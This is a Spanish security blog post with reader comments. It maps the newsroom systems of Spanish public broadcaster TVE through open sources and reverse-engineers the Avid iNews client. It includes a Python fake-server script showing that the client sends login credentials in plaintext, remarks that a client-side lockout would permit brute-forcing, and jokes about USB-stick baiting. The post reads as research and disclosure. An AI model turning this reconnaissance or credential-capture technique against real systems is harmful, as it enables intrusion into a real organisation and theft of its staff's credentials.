Random IRC quote :      <bgraian> estoy en panadero desconocido

¿Qué sabemos de TVE? No sabemos mucho.

Hola pepsicola.

Hoy, a menos que La Noria lleve a Ortega Cano para que explique cómo matar a alguien y estar en la calle, la pandereta estará sobrevolando “el debate” en breves minutos.

Hace unos meses surgió una nueva polémica política respecto al control de RTVE, si bien ésta era un poco más curiosa. En todas las noticias al respecto veíamos que se mencionaba explícitamente un sistema de generación de noticias para medios de comunicación, que es el estandar de facto de la industria, el iNews.

Me voy a morder la lengua por no hacer lo propio con la yugular de alguno, así que vamos a lo que vamos.

Primero establezcamos el contexto con estos artículos

http://www.rtve.es/television/20110923/comunicacion-sobre-decision-del-consejo-administracion-crtve-programa-inews/463593.shtml
http://www.vayatele.com/profesionales/que-es-inews-y-que-tiene-que-ver-con-el-consejo-de-rtve

Parece que todo el mundo confía en la integridad del acceso al iNews. Asi que me puse a investigar un poco cómo funcionan las “teles” por dentro, en este caso TVE.

Lo primero que hice fue llamar a RTVE e intentar sobornar con donetes a algunos empleados para que me pasaran información. La cosa, incomprensiblemente, no funcionó así que hubo que pasar al plan B: Open Source Intelligence. Es decir, lo de siempre: Webs,comunicados, notas de prensa, pliegos, videos, foros, ir a tomar cafe al mismo bar que suelen ir los trabajadores a poner la oreja o a dejar un pendrive con el logo de TVE olvidado en la barra, etc etc…

He hecho una selección de las fuentes que proporcionan más información:

En esta web http://www.cobdc.net/12JCD/actes/ nos encontramos con 3 documentos interesantes, las presentaciones y papers de “El Gestor de archivo, nuevo perfil profesional en la redacción única de TVE” y “El uso de imágenes procedentes de Internet en los informativos de TVE”

Encontramos informaciones técnicas y operativas interesantes, que nos permiten ir formándonos una imagen del escenario.

http://www.cobdc.org/jornades/12JCD/materials/comunicacions/pres/MEANA_gestor_archivo_nuevo_perfil_tve.pdf

http://www.cobdc.org/jornades/12JCD/materials/comunicacions/MEANA_gestor_archivo_nuevo_perfil_tve.pdf

http://www.cobdc.org/jornades/12JCD/materials/comunicacions/AGUILAR_uso_imagenes_internet_tve.pdf

Los dos últimos ficheros son fundamentales para entender el artículo, así que recomiendo su lectura. Explican la manera de funcionar de las redacciones de TVE, desde el punto de vista técnico y funcional.

Ejemplos de la información extraida

MEANA_gestor_archivo_nuevo_perfil_tve.pdf
En los SSII de TVE todos los periodistas tienen la posibilidad de trabajar con texto, audio y vídeo en alta resolución. Todos trabajan sobre estas plataformas y elaboran su noticia desde su puesto de trabajo, es decir, escriben texto y después sobre el mismo equipo abren su software de edición que apunta a servidores de vídeo o unidades de almacenamiento compartido donde pueden encontrar las imágenes que necesitan.

“Sin embargo, en la actual redacción digital de TVE, todo el material que
llega en cualquier formato, se digitaliza, y se introduce en el
almacenamiento compartido junto con los metadatos que lo identifican. Este
proceso de digitalización se llama “ingesta”.”

El sistema se compone de un gran almacenamiento compartido llamado
ISIS/Interplay (Avid) que contiene todos los materiales con los que se puede
trabajar en un día. Este gran almacén tiene una capacidad cercana a 4.000
horas de vídeo y audio. Desde cualquier puesto de trabajo se puede tener
acceso a este almacén, añadiendo nuevos materiales, ingestando o
descargando contenidos que servirán para elaborar nuevos productos
informativos

La Ingesta Central es donde se llevan a cabo las grabaciones de líneas. En
la redacción digital de TVE existe un departamento que graba las señales
externas en ISIS. Utiliza 24 equipos llamados Airspeed (Avid), que se
pueden programar si se trata de envíos periódicos

Una vez que el material ha pasado desde los Airspeed a ISIS, el redactor o
el realizador dispone del mismo y pueden editar su noticia o pieza con
cualquier sistema de edición no lineal.
Para el montaje de una noticia, el redactor trabaja con dos aplicaciones
principales:
Instinct e Inews (ambos de Avid) que trabajan en paralelo

AGUILAR_uso_imagenes_internet_tve.pdf
En el caso de los Informativos de TVE, las tareas estrictamente de ingesta
están a cargo de dos secciones distintas:
- Ingesta Central, encargada de la recepción de señales. Cuenta
para ello con 25 AirSpeed (servidor de ingesta directa de la
empresa Avid).
- Ingesta Local, responsable del resto de formatos que se capturan:
ENG, cintas del Archivo histórico, DVD, CD, Web y memorias tipo
flash. Cuenta con 6 NewsCutter Adrenalin


Esquema 1
Atendiendo a este esquema donde aparece Odetics para el archivo antiguo, deberían tener algo parecido a esto, mola.
http://www.youtube.com/watch?v=9fTJkVgRvpw


Esquema 2

Las imágenes y el texto recopiladas nos llevan a realizar otras búsquedas y averiguar que software, hardware y qué empresas están detrás.

Esta web de la revista de temática audiovisual nos ofrece un artículo con bastante información
http://www.tmbroadcast.es/index.php/tve-hasta-el-infinito-y-mas-alla/
Separándola convenientemente entre Producción, Emisión y Archivo.

Producción
En la redacción se han instalado un total de 300 clientes concurrentes. La herramienta básica de trabajo para el redactor es Avid iNews Instinct

Bien, esto cuadra con todo el revuelo organizado en base al control de iNews. Veamos un poco más del iNews en este video (3:05) de La 2 Noticias; Mara Torres invita a David Trueba a dirigir el informativo y donde hablan brevemente sobre este software.


El Famoso iNews

Podemos deducir un poco más de como tienen estructurada la arquitectura, se ve que usan switchs KVM

Emisión
“Como sistema de emisión se ha instalado el sistema ADC-100 de Harris con cliente, Production Client”

Fijaos en la pantalla resaltada, bastante parecida a ésta, perteneciente al BroadcastSupervisor del ADC-100, lo que también cuadra.

La arquitectura vendría a ser así

Podemos observar varios de los elementos que vemos en la foto de La 2.

A más alto nivel

Recapitulando, tenemos que están usando básicamente:

Avid NewsCutter XP
Avid NewsCutter Adrenaline
Avid iNews/Instinct
Avid Media Composer
Avid Interplay
Servers Avid MediaStream
Server Avid Unity ISIS
25 servers AirSpeed
Sistema Harris ADC-100 con el hardware/software asociado

Echemos un ojo al uso de puertos, y por lo tanto funcionalidades, por parte del Software/hardware de Avid http://cdn.pinnaclesys.com/SupportFiles/FAQ_Avid/243397/Port_Usage_Guide_UPDATED_24SEP2009.xls

Es un CTF en toda regla. Cuanto más lejos llegues, más pollas ascii podrás poner en el mapa del tiempo durante el telediario.

¿Cómo de seguro es el iNews?

Con tanto revuelo, que si se puede acceder o no al iNews y ver qué está escribiendo cada periodista, quise echar un ojo a la autentificación al menos.

En principio debido a las características del Software de Avid y los tipos de clientes, es bastante restringido. Aunque haciendo un poco el retard-ninja he conseguido algunos, entre ellos el famoso iNews.

Como hemos visto iNews es un software cliente, y desgraciadamente no tenemos acceso al servidor. Sin embargo, sólo para escarbar la superficie de lo que puede ser, quise comprobar si al menos cifraba las credenciales antes de enviarlas al servidor. Efectivamente no.

Si no tenemos un servidor pues no los inventamos, mejor dicho lo moldeamos. La técnica es útil en estos casos: crear un server dummy, dejar que el cliente iNews -ANWS.exe- hable con nosotros y ver qué peticiones espera. Vamos analizando el parser de paquetes y construimos el servidor según esto, finalmente podemos completar la secuencia y llegar a la autentificación

Básicamente el cliente se comunica con el server, le envía un ‘ping’ y este le dice que acción realizar, sí está disponible o no, seguidamente se comprueban que las versiones de ambos son compatibles y se realiza la petición de autentificación.

Mediante ingeniería inversa vamos analizando las peticiones que espera recibir el cliente y cómo parsea los datos, moldeandonos el server según lo que vemos, que quedaría así.

import socket
import binascii

server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.bind(("", 1019))
server_socket.listen(1)

print "Fake iNews Server – Testing plain authentication"
client_socket, address = server_socket.accept()
print "Britney spears is connected"
print "Receiving PING"

data = client_socket.recv(2)
print repr(data)
print "OK- Sending LOGIN Request"
client_socket.send ("\x04\x00\x00\x00")
print "Receiving CLIENT version"
data = client_socket.recv(28)
print repr(data)
print "Sending SERVER Version"
client_socket.send ("\x04")
data = client_socket.recv(8)
print "Initiating AUTH request"
print repr(data)
print "Completing AUTH request"
client_socket.send("\x80")
client_socket.send("\x81"*0×20)
print "receiving plaintext user/password, leaking memory…"
data = client_socket.recv(8)
print repr(data)
data = client_socket.recv(800)
print repr(data)
 

Fake iNews Server – Testing plain authentication
Britney spears is connected
Receiving PING
‘\x17\n’
OK- Sending LOGIN Request
Receiving CLIENT version
‘#(@) 3.2.5.9 DOS\x00′
Sending SERVER Version
Initiating AUTH request
‘\xfc\x03\x00\x00\xfc\x03\x00\x00′
Completing AUTH request
receiving plaintext user/password…
‘\x05\x81\x81\x00\xfe\x01\x02\x00′
‘\x00\x04\x81\x81\x00\x01\x02\t\x00\xbd\x04\x81\x00\x04\x14\x02a\x00a\x00a\x00a\x00a\x00a\x00a\x00a\x00a\x00a\x00….

Curiosamente tras 3 intentos fallidos de autentificación, el programa muestra un Message Box diciéndote que has agotado los intentos, que te pires y se cierra. Pero teniendo en cuenta que nosotros somos el server y no le hemos dicho nada, la cuenta de los logins fallidos está en el lado cliente.

Lo que no puedo asegurar es si sólo está en ese lado, ya que no tengo un server. Si sólo se mantiene en el client-side además podríamos construir un programa para bruteforcear logins facilmente. La forma de interceptar las credenciales ya dependería de la arquitectura de red.

Los periodistas pueden estar “tranquilos”, a nivel de la aplicación sus credenciales están viajando en texto claro. Vamos que si no oficialmente, ‘extraoficialmente’ en principio no parece muy complicado monitorizarlo.

Bueno, pues ya sabemos algo más de cómo funciona TVE por dentro. Ahora a ‘disfrutar’ del debate, a ver si pasa algo raro…

Si alguno tiene más información o correcciones, escribid un comentario!

Hasta la próxima gorrillas del ciberespacio.

6 Comentarios para “¿Qué sabemos de TVE? No sabemos mucho.”

  1. Comment por Diego | 11/08/11 at 9:16 am

    Me ha parecido muy interesante la entrada. Lo único que creo que deberías hacer es integrar los enlaces en el propio texto, no dejar las URL así, a la vista. Más o menos como hiciste en la frase “[…] Veamos un poco más del iNews en este vídeo (3:05) de La 2 Noticias […]” donde “vídeo (3:05)” es quien lleva el enlace integrado en el texto.

  2. Comment por Ruben Santamarta | 11/09/11 at 12:24 am

    Muchas gracias por el comentario Simba :) Si quieres contar más, encantado xD

  3. Comment por Ana Pajtor | 11/09/11 at 11:20 am

    Lo de que se me caió el burka fue un montaje de alguien que jakeo el iNews.

  4. Comment por n0wdev | 11/28/11 at 9:33 am

    Como siempre, muy bueno el artículo, Rubén. Es increíble que la conciencia sobre seguridad sea inversamente proporcional a la dependencia que tenemos de la tecnología, en todo.

    Un saludo.

  5. Comment por whoKnows | 01/18/12 at 10:40 pm

    Hola Rubén,
    excelente artículo. Visito frecuentemente las instalaciones de TVE, principalmente en Torre España y Prado del Rey y he de agradecerte tu explicación. Me ha servido para entender un poco mejor el funcionamiento de la redacción de noticias.
    Igual continúo tu investigación un día de estos…

    Gracias!

  6. Comment por Dubturbo | 06/06/12 at 9:47 am

    mismo bar que suelen ir los trabajadores a poner la oreja o a dejar un pendrive con el logo de TVE olvidado en la barra, etc etc

Se han cerrado los comentarios